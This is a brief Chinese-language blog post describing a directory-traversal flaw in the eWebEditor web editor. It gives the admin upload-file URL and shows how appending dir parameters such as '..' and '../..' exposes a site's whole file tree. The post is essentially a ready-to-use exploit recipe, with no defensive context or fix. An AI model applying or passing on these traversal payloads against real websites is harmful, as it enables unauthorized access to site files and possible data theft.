现在的位置: 首页 > 综合 > 正文

ewebeditor遍历路径漏洞

2012年11月25日 ⁄ 综合 ⁄ 共 110字 ⁄ 字号 评论关闭
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.cnblogs.com/../.. 看到整个网站文件了  

抱歉!评论已关闭.